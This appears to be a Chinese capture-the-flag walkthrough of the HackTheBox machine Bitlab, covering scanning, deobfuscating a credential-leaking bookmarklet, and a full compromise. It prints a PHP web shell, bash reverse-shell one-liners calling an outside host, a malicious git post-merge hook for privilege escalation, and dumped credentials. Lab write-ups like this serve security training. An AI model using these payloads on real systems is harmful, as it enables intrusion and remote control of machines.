﹀
﹀
﹀
0x00 本文目录
-
反思与总结 -
基本信息 -
渗透测试过程 -
补充
0x01 反思与总结
0x02 基本信息
0x03 渗透测试过程
端口探测
root@kali:~/HTB/bitlab# nmap ‐sC ‐sV ‐oA bitloab 10.10.10.114
StartingNmap7.80( https://nmap.org ) at 2020‐01‐2210:04 CST
Nmap scan report for10.10.10.114
Host is up (0.24s latency).
Not shown:998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH7.6p1Ubuntu4ubuntu0.3(UbuntuLinux; protocol 2.0)
| ssh‐hostkey:
|2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18(RSA)
|256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_ 256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55(ED25519)
80/tcp open http nginx
| http‐robots.txt:55 disallowed entries (15 shown)
|//autocomplete/users /search /api /admin /profile
|/dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s//snippets/new /snippets/*/edit
| http‐title:Signin xC2xB7 GitLab
|_Requested resource was http://10.10.10.114/users/sign_in
|_http‐trane‐info:Problem with XML parsing of /evox/about
ServiceInfo: OS:Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed.Please report any incorrect results at
https://nmap.org/submit/.
Nmapdone:1 IP address (1 host up) scanned in34.44 seconds
目录探测
gobuster dir ‐u "http://10.10.10.114/"‐w /usr/share/wordlists/dirbuster/directory‐list‐
2.3‐medium.txt ‐t 150‐s 200,204,301,307,401,403‐o bitlab.gobuster
dir: 表示扫描目录的模式 -w: 使用的字典 -t: 线程数量 -s: 只显示响应码为200,204,301,307,401,403的路径,因为我们访问网页的时候有些位置是不允许我们访问会被302跳转到登录界面
漏洞发现
javascript:(function(){
var _0x4b18 =["x76x61x6Cx75x65","x75x73x65x72x5Fx6Cx6Fx67x69x6E",
"x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64","x63x6Cx61x76x65",
"x75x73x65x72x5Fx70x61x73x73x77x6Fx72x64",
"x31x31x64x65x73x30x30x38x31x78"];
document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];
document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];
})()
var _0x4b18 =["value","user_login","getElementById","clave","user_password",
"11des0081x"];
document[getElementById](user_login)[value]= clave;
document[getElementById](user_password)[value]=11des0081x;
<?php
$input = file_get_contents("php://input");
$payload = json_decode($input);
$repo = $payload‐>project‐>name ??'';
$event = $payload‐>event_type ??'';
$state = $payload‐>object_attributes‐>state ??'';
$branch = $payload‐>object_attributes‐>target_branch ??'';
if($repo=='Profile'&& $branch=='master'&& $event=='merge_request'&& $state=='merged')
{
echo shell_exec('cd ../profile/; sudo git pull'),"n";
}
echo "OKn";

<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd =($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>

http://10.10.10.114/profile/dfz.php?cmd=whoami
curl ‐G "http://10.10.10.114/profile/dfz.php"‐‐data‐urlencode 'cmd=whoami'
-G:表示发送GET请求 --data--urlencode:对数据进行URL编码
反弹shell
curl ‐G "http://10.10.10.114/profile/dfz.php"‐‐data‐urlencode "cmd=bash ‐c 'bash ‐i >&
/dev/tcp/10.10.14.13/9001 0>&1'"
python ‐c "import pty;pty.spawn('/bin/bash')"
ctrl + z (后台挂起shell)
stty raw ‐echo
fg +多个回车
stty rows 34 cols 136
export TERM=xterm
权限提升
man githooks

/tmp/dfz/profile/.git/hooks/
中创建一个 post-merge
文件 ,并赋予执行权限
#!/bin/bash
bash ‐c 'bash ‐i >& /dev/tcp/10.10.14.11/9000 0>&1'

0x04 补充
http://10.10.10.114/users/clave/snippets
<?php
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles
password=profiles");
$result = pg_query($db_connection,"SELECT * FROM profiles");
var_dump(pg_fetch_all($result));
?>
array(1) {
[0]=>
array(3) {
["id"]=>
string(1) "1"
["username"]=>
string(5) "clave"
["password"]=>
string(22) "c3NoLXN0cjBuZy1wQHNz=="
}
}
scp clave@10.10.10.114:RemoteConnection.exe .
Qf7]8YSV.wDNF*[7d?j&eD4^
原文始发于微信公众号(betasec):靶场攻略 | 靶机Bitlab的渗透测试
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论